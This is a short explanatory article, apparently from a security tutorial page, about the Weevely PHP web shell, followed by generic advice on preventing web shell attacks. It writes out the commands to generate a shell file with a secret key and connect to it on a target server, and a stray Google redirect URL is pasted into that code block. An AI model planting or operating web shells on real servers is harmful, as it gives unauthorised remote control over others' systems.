What is Weevely?

Weevely is a web shell designed for remote server administration that allows you to run commands and browse remote systems, even in restricted environments. It provides a command-line interface to the target system's web server.

Weevely Example

Here is a simple example of using Weevely to create and use a web shell:

             // Generate a Weevely PHP web shell
   https://www.google.com/url?sa=i&url=https%3A%2F%2Fwww.kali.org%2Ftools%2Fweevely%2F&psig=AOvVaw1Hx-gp9sQslFPPYiFvMPPF&ust=1691906905178000&source=images&cd=vfe&opi=89978449&ved=0CBAQjRxqFwoTCODv4sK61oADFQAAAAAdAAAAABAE          weevely generate secretkey shell.php
     
             // Use the Weevely web shell
             weevely http://example.com/shell.php secretkey
             

In this example, the 'weevely generate' command is used to create a PHP web shell with a secret key of 'secretkey'. The 'weevely' command is then used to connect to the web shell on the target server.

Prevention

Preventing web shell attacks involves proper input validation, sanitization, and limiting the server's ability to execute system commands. This includes:

• Input validation: Validate user input by only accepting expected values.
• Use allow lists: Only allow known good input to pass through.
• Sanitize input: Remove or replace special characters from user input.
• Limit system commands: Limit the server's ability to execute system commands, especially from user input.